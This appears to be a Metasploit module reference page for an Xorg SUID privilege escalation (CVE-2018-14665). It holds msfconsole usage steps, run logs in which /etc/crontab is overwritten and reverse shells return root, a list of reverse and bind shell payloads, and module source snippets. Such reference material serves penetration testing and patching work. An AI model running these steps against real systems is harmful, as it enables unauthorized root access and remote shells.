Xorg X11 Server SUID logfile Privilege Escalation - Metasploit
This page contains detailed information about how to use the exploit/multi/local/xorg_x11_suid_server metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Xorg X11 Server SUID logfile Privilege Escalation
Module: exploit/multi/local/xorg_x11_suid_server
Source code: modules/exploits/multi/local/xorg_x11_suid_server.rb
Disclosure date: 2018-10-25
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): cmd, x86, x64
Supported platform(s): Linux, OpenBSD
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2018-14665
This module attempts to gain root privileges with SUID Xorg X11 server versions 1.19.0 < 1.20.3. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with OpenBSD 6.3, 6.4, CentOS 7.4.1708, and CentOS 7.5.1804, and RHEL 7.5. The default PAM configuration for CentOS and RHEL systems requires console auth for the user's session to start the Xorg server. Cron launches the payload, so if SELinux is enforcing, exploitation may still be possible, but the module will bail. Xorg must have SUID permissions and may not start if already running. On exploitation a crontab.old backup file will be created by Xorg. This module will remove the .old file and restore crontab after successful exploitation. Failed exploitation may result in a corrupted crontab. On successful exploitation artifacts will be created consistant with starting Xorg and running a cron.
Module Ranking and Traits
Module Ranking:
- good: The exploit has a default target and it is the "common case" for this type of software (English, Windows 7 for a desktop app, 2012 for server, etc). More information about ranking can be found here.
Basic Usage
Note: To run a local exploit, make sure you are at the msf prompt.
Also, to check the session ID, use the sessions
command.
msf > use exploit/multi/local/xorg_x11_suid_server
msf exploit(xorg_x11_suid_server) > show targets
... a list of targets ...
msf exploit(xorg_x11_suid_server) > set TARGET target-id
msf exploit(xorg_x11_suid_server) > show options
... show and set options ...
msf exploit(xorg_x11_suid_server) > set SESSION session-id
msf exploit(xorg_x11_suid_server) > exploit
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Description
This module attempts to gain root privileges using Xorg X11 server versions 1.19.0 < 1.20.3 set as SUID. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This flaw allows users to write over existing files on the system. This exploit backs up crontab and then uses -logfile to overwrite it. A command to be run is set for the Font Path argument -fp which will be logged and ran by cron.
Vulnerable Application
Xorg (commonly referred as simply X) is the most popular display server among Linux users. Its ubiquity has led to making it an ever-present requisite for GUI applications, resulting in massive adoption from most distributions.
Xorg is more restrictive to exploit under CentOS / RHEL. The user must have console lock and SeLinux may interfere. If Selinux is enforcing crontabs context will be changed on exploit and you will be unable to clean it.
This module has been tested successfully on:
- OpenBSD 6.3
- OpenBSD 6.4
- CentOS 7.4.1708 x86_64
- CentOS 7.5.1084 x86_64
- Red Hat Enterprise Linux 7.5 x86_64
Verification Steps
On CentOS/RHEL your session must have console lock. To get a console lock you can login locally with a user.
- Start
msfconsole
- Get a session
- Do:
use exploit/multi/local/xorg_x11_suid_server
- Do: Set a payload/target or use default(cmd/unix/reverse_openssl)
- Do:
set SESSION [SESSION]
- Do:
set LHOST [LHOST]
- Do:
run
- You should get a new root session
Advanced Options
Xdisplay
Display to use for Xorg (default: :1
)
WritableDir
A writable directory file system path (default: /tmp
)
ConsoleLock
Will check for console lock under linux (default: true
)
Scenarios
OpenBSD
msf5 > use exploit/multi/local/xorg_x11_suid_server
msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
session => 1
msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.30.0.2
lhost => 172.30.0.2
msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
verbose => true
msf5 exploit(multi/local/xorg_x11_suid_server) > run
[!] SESSION may not be compatible with this module.
[*] Started reverse double SSL handler on 172.30.0.2:4444
[+] Passed all initial checks for exploit
[*] Uploading your payload, this could take a while
[*] Trying /etc/crontab overwrite
[+] /etc/crontab overwrite successful
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo t2XWfcWkZHevLPS8;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "t2XWfcWkZHevLPS8\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (172.30.0.2:4444 -> 172.30.0.99:41253) at 2018-11-12 15:06:39 -0600
[+] Returning session after cleaning
[+] Deleted /tmp/.session-odRjfx
id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
CentOS 7.4.1708 x86_64
msf5 > use exploit/multi/local/xorg_x11_suid_server
msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
session => 1
msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
verbose => true
msf5 exploit(multi/local/xorg_x11_suid_server) > run
[*] Started reverse double SSL handler on 172.16.191.188:4444
[*] Running additional check for Linux
[+] Console lock for user
[+] Selinux is not an issue
[+] Xorg path found at /usr/bin/Xorg
[+] Xorg binary /usr/bin/Xorg is SUID
[+] Xorg version 1.19.3 is vulnerable
[!] Xorg in process list
[!] Could not get version or Xorg process possibly running, may fail
[+] Passed all initial checks for exploit
[*] Uploading your payload, this could take a while
[*] Trying /etc/crontab overwrite
[+] /etc/crontab overwrite successful
[*] Waiting on cron to run
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo zk0jobDMxFdBxLBU;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "zk0jobDMxFdBxLBU\n"
[*] Matching...
[*] B is input...
[*] Command shell session 7 opened (172.16.191.188:4444 -> 172.16.191.141:46318) at 2018-11-24 21:31:04 -0500
[*] Waiting on cron to run
[+] Returning session after cleaning
[+] Deleted /tmp/.session-Tafw0iW0r8
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
uname -a
Linux centos-7-1708.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
Red Hat Enterprise Linux 7.5 x86_64
msf5 > use exploit/multi/local/xorg_x11_suid_server
msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
session => 1
msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
verbose => true
msf5 exploit(multi/local/xorg_x11_suid_server) > run
[*] Started reverse double SSL handler on 172.16.191.165:4444
[*] Running additional check for Linux
[+] Console lock for user
[+] Selinux is not an issue
[+] Xorg path found at /usr/bin/Xorg
[+] Xorg binary /usr/bin/Xorg is SUID
[+] Xorg version 1.19.5 is vulnerable
[!] Xorg in process list
[!] Could not get version or Xorg process possibly running, may fail
[+] Passed all initial checks for exploit
[*] Uploading your payload, this could take a while
[*] Trying /etc/crontab overwrite
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo EEdPp66R4es6U3WF;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[+] /etc/crontab overwrite successful. Waiting for job to run (may take a minute)...
[*] Reading from socket B
[*] B: "EEdPp66R4es6U3WF\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.228:44978) at 2019-04-21 06:29:04 -0400
[+] Returning session after cleaning
[+] Deleted /tmp/.session-aqxyug0fH
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
uname -a
Linux red-hat-7-5-x64.local 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64 x86_64 x86_64 GNU/Linux
cat /etc/redhat-release
Red Hat Enterprise Linux Server release 7.5 (Maipo)
Go back to menu.
Msfconsole Usage
Here is how the multi/local/xorg_x11_suid_server exploit module looks in the msfconsole:
msf6 > use exploit/multi/local/xorg_x11_suid_server
[*] Using configured payload cmd/unix/reverse_openssl
msf6 exploit(multi/local/xorg_x11_suid_server) > show info
Name: Xorg X11 Server SUID logfile Privilege Escalation
Module: exploit/multi/local/xorg_x11_suid_server
Platform: OpenBSD, Linux
Arch: cmd, x86, x64
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Good
Disclosed: 2018-10-25
Provided by:
Narendra Shinde
Raptor - 0xdea
Aaron Ringo
bcoles <[email protected]>
Available targets:
Id Name
-- ----
0 OpenBSD
1 Linux x64
2 Linux x86
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload information:
Description:
This module attempts to gain root privileges with SUID Xorg X11
server versions 1.19.0 < 1.20.3. A permission check flaw exists for
-modulepath and -logfile options when starting Xorg. This allows
unprivileged users that can start the server the ability to elevate
privileges and run arbitrary code under root privileges. This module
has been tested with OpenBSD 6.3, 6.4, CentOS 7.4.1708, and CentOS
7.5.1804, and RHEL 7.5. The default PAM configuration for CentOS and
RHEL systems requires console auth for the user's session to start
the Xorg server. Cron launches the payload, so if SELinux is
enforcing, exploitation may still be possible, but the module will
bail. Xorg must have SUID permissions and may not start if already
running. On exploitation a crontab.old backup file will be created
by Xorg. This module will remove the .old file and restore crontab
after successful exploitation. Failed exploitation may result in a
corrupted crontab. On successful exploitation artifacts will be
created consistant with starting Xorg and running a cron.
References:
https://nvd.nist.gov/vuln/detail/CVE-2018-14665
http://www.securityfocus.com/bid/105741
https://www.exploit-db.com/exploits/45697
https://www.exploit-db.com/exploits/45742
https://www.exploit-db.com/exploits/45832
https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm
Module Options
This is a complete list of options available in the multi/local/xorg_x11_suid_server exploit:
msf6 exploit(multi/local/xorg_x11_suid_server) > show options
Module options (exploit/multi/local/xorg_x11_suid_server):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (cmd/unix/reverse_openssl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 OpenBSD
Advanced Options
Here is a complete list of advanced options supported by the multi/local/xorg_x11_suid_server exploit:
msf6 exploit(multi/local/xorg_x11_suid_server) > show advanced
Module advanced options (exploit/multi/local/xorg_x11_suid_server):
Name Current Setting Required Description
---- --------------- -------- -----------
ConsoleLock true yes Will check for console lock on linux systems
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableContextEncoding false no Use transient context when encoding payloads
FileDropperDelay no Delay in seconds before attempting cleanup
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 120 no Additional delay in seconds to wait for a session
WritableDir /tmp yes A directory where we can write files
Xdisplay :1 yes Display exploit will attempt to use
Payload advanced options (cmd/unix/reverse_openssl):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
CreateSession true no Create a new session for every successful login
HandlerSSLCert no Path to a SSL certificate in unified PEM format
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the multi/local/xorg_x11_suid_server module can exploit:
msf6 exploit(multi/local/xorg_x11_suid_server) > show targets
Exploit targets:
Id Name
-- ----
0 OpenBSD
1 Linux x64
2 Linux x86
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the multi/local/xorg_x11_suid_server exploit:
msf6 exploit(multi/local/xorg_x11_suid_server) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK)
1 payload/cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
2 payload/cmd/unix/bind_jjs normal No Unix Command Shell, Bind TCP (via jjs)
3 payload/cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua)
4 payload/cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat)
5 payload/cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e)
6 payload/cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6
7 payload/cmd/unix/bind_nodejs normal No Unix Command Shell, Bind TCP (via nodejs)
8 payload/cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
9 payload/cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
10 payload/cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R)
11 payload/cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
12 payload/cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
13 payload/cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat)
14 payload/cmd/unix/bind_stub normal No Unix Command Shell, Bind TCP (stub)
15 payload/cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh)
16 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
17 payload/cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
18 payload/cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK)
19 payload/cmd/unix/reverse_bash normal No Unix Command Shell, Reverse TCP (/dev/tcp)
20 payload/cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
21 payload/cmd/unix/reverse_bash_udp normal No Unix Command Shell, Reverse UDP (/dev/udp)
22 payload/cmd/unix/reverse_jjs normal No Unix Command Shell, Reverse TCP (via jjs)
23 payload/cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh)
24 payload/cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua)
25 payload/cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat)
26 payload/cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat)
27 payload/cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e)
28 payload/cmd/unix/reverse_nodejs normal No Unix Command Shell, Reverse TCP (via nodejs)
29 payload/cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl)
30 payload/cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
31 payload/cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
32 payload/cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php)
33 payload/cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python)
34 payload/cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python)
35 payload/cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R)
36 payload/cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
37 payload/cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
38 payload/cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat)
39 payload/cmd/unix/reverse_ssh normal No Unix Command Shell, Reverse TCP SSH
40 payload/cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
41 payload/cmd/unix/reverse_stub normal No Unix Command Shell, Reverse TCP (stub)
42 payload/cmd/unix/reverse_tclsh normal No Unix Command Shell, Reverse TCP (via Tclsh)
43 payload/cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh)
44 payload/generic/custom normal No Custom Payload
45 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
46 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
Evasion Options
Here is the full list of possible evasion options supported by the multi/local/xorg_x11_suid_server exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(multi/local/xorg_x11_suid_server) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- No console lock for <USER>
- Selinux is enforcing
- Could not find Xorg executable
- Xorg binary <XORG_PATH> is not SUID
- Xorg version <V> not supported
- Fatal server error
- User probably does not have console auth
- Below is Xorg -version output
- Could not parse Xorg -version output
- Xorg in process list
- Could not get version or Xorg process possibly running, may fail
- Target not vulnerable
- This session already has root privileges
- <WRITABLEDIR> is not writable
- Deleting crontab backup
- /etc/crontab not modified
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
No console lock for <USER>
Here is a relevant code snippet related to the "No console lock for <USER>" error message:
105: if uname =~ /linux/i
106: vprint_status "Running additional check for Linux"
107: if datastore['ConsoleLock']
108: user = cmd_exec "id -un"
109: unless exist? "/var/run/console/#{user}"
110: vprint_error "No console lock for #{user}"
111: return CheckCode::Safe
112: end
113: vprint_good "Console lock for #{user}"
114: end
115: if selinux_installed?
Selinux is enforcing
Here is a relevant code snippet related to the "Selinux is enforcing" error message:
112: end
113: vprint_good "Console lock for #{user}"
114: end
115: if selinux_installed?
116: if selinux_enforcing?
117: vprint_error 'Selinux is enforcing'
118: return CheckCode::Safe
119: end
120: end
121: vprint_good "Selinux is not an issue"
122: end
Could not find Xorg executable
Here is a relevant code snippet related to the "Could not find Xorg executable" error message:
122: end
123:
124: # suid program check
125: xorg_path = cmd_exec "command -v Xorg"
126: unless xorg_path.include?("Xorg")
127: vprint_error "Could not find Xorg executable"
128: return CheckCode::Safe
129: end
130: vprint_good "Xorg path found at #{xorg_path}"
131: unless setuid? xorg_path
132: vprint_error "Xorg binary #{xorg_path} is not SUID"
Xorg binary <XORG_PATH> is not SUID
Here is a relevant code snippet related to the "Xorg binary <XORG_PATH> is not SUID" error message:
127: vprint_error "Could not find Xorg executable"
128: return CheckCode::Safe
129: end
130: vprint_good "Xorg path found at #{xorg_path}"
131: unless setuid? xorg_path
132: vprint_error "Xorg binary #{xorg_path} is not SUID"
133: return CheckCode::Safe
134: end
135: vprint_good "Xorg binary #{xorg_path} is SUID"
136:
137: # version check
Xorg version <V> not supported
Here is a relevant code snippet related to the "Xorg version <V> not supported" error message:
137: # version check
138: x_version = cmd_exec "Xorg -version"
139: if x_version.include?("Release Date")
140: v = Rex::Version.new(x_version.scan(/\d\.\d+\.\d+/).first)
141: unless v.between?(Rex::Version.new('1.19.0'), Rex::Version.new('1.20.2'))
142: vprint_error "Xorg version #{v} not supported"
143: return CheckCode::Safe
144: end
145: elsif x_version.include?("Fatal server error")
146: vprint_error "User probably does not have console auth"
147: vprint_error "Below is Xorg -version output"
Fatal server error
Here is a relevant code snippet related to the "Fatal server error" error message:
140: v = Rex::Version.new(x_version.scan(/\d\.\d+\.\d+/).first)
141: unless v.between?(Rex::Version.new('1.19.0'), Rex::Version.new('1.20.2'))
142: vprint_error "Xorg version #{v} not supported"
143: return CheckCode::Safe
144: end
145: elsif x_version.include?("Fatal server error")
146: vprint_error "User probably does not have console auth"
147: vprint_error "Below is Xorg -version output"
148: vprint_error x_version
149: return CheckCode::Safe
150: else
User probably does not have console auth
Here is a relevant code snippet related to the "User probably does not have console auth" error message:
141: unless v.between?(Rex::Version.new('1.19.0'), Rex::Version.new('1.20.2'))
142: vprint_error "Xorg version #{v} not supported"
143: return CheckCode::Safe
144: end
145: elsif x_version.include?("Fatal server error")
146: vprint_error "User probably does not have console auth"
147: vprint_error "Below is Xorg -version output"
148: vprint_error x_version
149: return CheckCode::Safe
150: else
151: vprint_warning "Could not parse Xorg -version output"
Below is Xorg -version output
Here is a relevant code snippet related to the "Below is Xorg -version output" error message:
142: vprint_error "Xorg version #{v} not supported"
143: return CheckCode::Safe
144: end
145: elsif x_version.include?("Fatal server error")
146: vprint_error "User probably does not have console auth"
147: vprint_error "Below is Xorg -version output"
148: vprint_error x_version
149: return CheckCode::Safe
150: else
151: vprint_warning "Could not parse Xorg -version output"
152: return CheckCode::Appears
Could not parse Xorg -version output
Here is a relevant code snippet related to the "Could not parse Xorg -version output" error message:
146: vprint_error "User probably does not have console auth"
147: vprint_error "Below is Xorg -version output"
148: vprint_error x_version
149: return CheckCode::Safe
150: else
151: vprint_warning "Could not parse Xorg -version output"
152: return CheckCode::Appears
153: end
154: vprint_good "Xorg version #{v} is vulnerable"
155:
156: # process check for /X
Xorg in process list
Here is a relevant code snippet related to the "Xorg in process list" error message:
154: vprint_good "Xorg version #{v} is vulnerable"
155:
156: # process check for /X
157: proc_list = cmd_exec "ps ax"
158: if proc_list.include?('/X ')
159: vprint_warning('Xorg in process list')
160: return CheckCode::Appears
161: end
162: vprint_good('Xorg does not appear running')
163: return CheckCode::Vulnerable
164: end
Could not get version or Xorg process possibly running, may fail
Here is a relevant code snippet related to the "Could not get version or Xorg process possibly running, may fail" error message:
176: end
177:
178: def exploit
179: check_status = check
180: if check_status == CheckCode::Appears
181: print_warning 'Could not get version or Xorg process possibly running, may fail'
182: elsif check_status == CheckCode::Safe
183: fail_with Failure::NotVulnerable, 'Target not vulnerable'
184: end
185:
186: if is_root?
Target not vulnerable
Here is a relevant code snippet related to the "Target not vulnerable" error message:
178: def exploit
179: check_status = check
180: if check_status == CheckCode::Appears
181: print_warning 'Could not get version or Xorg process possibly running, may fail'
182: elsif check_status == CheckCode::Safe
183: fail_with Failure::NotVulnerable, 'Target not vulnerable'
184: end
185:
186: if is_root?
187: fail_with Failure::BadConfig, 'This session already has root privileges'
188: end
This session already has root privileges
Here is a relevant code snippet related to the "This session already has root privileges" error message:
182: elsif check_status == CheckCode::Safe
183: fail_with Failure::NotVulnerable, 'Target not vulnerable'
184: end
185:
186: if is_root?
187: fail_with Failure::BadConfig, 'This session already has root privileges'
188: end
189:
190: unless writable? datastore['WritableDir']
191: fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
192: end
<WRITABLEDIR> is not writable
Here is a relevant code snippet related to the "<WRITABLEDIR> is not writable" error message:
186: if is_root?
187: fail_with Failure::BadConfig, 'This session already has root privileges'
188: end
189:
190: unless writable? datastore['WritableDir']
191: fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
192: end
193:
194: print_good 'Passed all initial checks for exploit'
195:
196: pscript = "#{datastore['WritableDir']}/.session-#{rand_text_alphanumeric 5..10}"
Deleting crontab backup
Here is a relevant code snippet related to the "Deleting crontab backup" error message:
216: cmd_exec "pkill Xorg"
217: Rex.sleep 1
218: cron_check = cmd_exec "grep -F #{pscript} /etc/crontab"
219: unless cron_check.include? pscript
220: rm_f "#{pscript}.b"
221: print_error 'Deleting crontab backup'
222: fail_with Failure::NotVulnerable, '/etc/crontab not modified'
223: end
224: print_good '/etc/crontab overwrite successful. Waiting for job to run (may take a minute)...'
225: end
226: end
/etc/crontab not modified
Here is a relevant code snippet related to the "/etc/crontab not modified" error message:
216: cmd_exec "pkill Xorg"
217: Rex.sleep 1
218: cron_check = cmd_exec "grep -F #{pscript} /etc/crontab"
219: unless cron_check.include? pscript
220: rm_f "#{pscript}.b"
221: print_error 'Deleting crontab backup'
222: fail_with Failure::NotVulnerable, '/etc/crontab not modified'
223: end
224: print_good '/etc/crontab overwrite successful. Waiting for job to run (may take a minute)...'
225: end
226: end
Go back to menu.
Related Pull Requests
- #14769 Merged Pull Request: Handle nil versions in preparation for rubygems 4
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #11764 Merged Pull Request: Update tested versions for xorg_x11_suid_server module
- #11234 Merged Pull Request: revisionism
- #11015 Merged Pull Request: Improve Xorg_privesc module consolelock check, payload upload & formatting
- #10916 Merged Pull Request: Add module Xorg SUID privesc
References
- CVE-2018-14665
- BID-105741
- EDB-45697
- EDB-45742
- EDB-45832
- https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
- https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm
See Also
Check also the following modules related to this module:
- exploit/aix/local/xorg_x11_server
- exploit/multi/local/xorg_x11_suid_server_modulepath
- exploit/multi/local/allwinner_backdoor
- exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
- exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout
- exploit/linux/http/rancher_server
- exploit/linux/misc/qnap_transcode_server
- exploit/multi/misc/java_jmx_server
- exploit/multi/misc/java_rmi_server
- exploit/windows/browser/yahoomessenger_server
- exploit/windows/ftp/xlink_server
- exploit/windows/misc/bigant_server
- exploit/windows/misc/hta_server
- exploit/windows/misc/mirc_privmsg_server
- exploit/windows/scada/codesys_web_server
- exploit/windows/scada/procyon_core_server
- auxiliary/scanner/x11/open_x11
- exploit/unix/x11/x11_keyboard_exec
- exploit/multi/gdb/gdb_server_exec
- exploit/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec
- exploit/multi/http/makoserver_cmd_exec
- exploit/multi/http/rocket_servergraph_file_requestor_rce
- exploit/multi/misc/bmc_server_automation_rscd_nsh_rce
- exploit/multi/misc/indesign_server_soap
- exploit/multi/realserver/describe
- exploit/linux/local/asan_suid_executable_priv_esc
- exploit/linux/local/ktsuss_suid_priv_esc
- exploit/linux/local/omniresolve_suid_priv_esc
- exploit/linux/local/zyxel_suid_cp_lpe
Related Nessus plugins:
- SUSE SLES11 Security Update : xorg-x11-server (SUSE-SU-2018:3456-1)
- Debian DSA-4328-1 : xorg-server - security update
- Ubuntu 16.04 LTS / 18.04 LTS / 18.10 : X.Org X server vulnerability (USN-3802-1)
- GLSA-201810-09 : X.Org X Server: Privilege escalation
- RHEL 7 : xorg-x11-server (RHSA-2018:3410)
- Oracle Linux 7 : xorg-x11-server (ELSA-2018-3410)
- CentOS 7 : xorg-x11-server (CESA-2018:3410)
- openSUSE Security Update : xorg-x11-server (openSUSE-2018-1420)
- Scientific Linux Security Update : xorg-x11-server on SL7.x x86_64 (20181031)
- AIX 6.1 TL 9 : xorg (IJ11000)
Authors
- Narendra Shinde
- Raptor - 0xdea
- Aaron Ringo
- bcoles
Version
This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.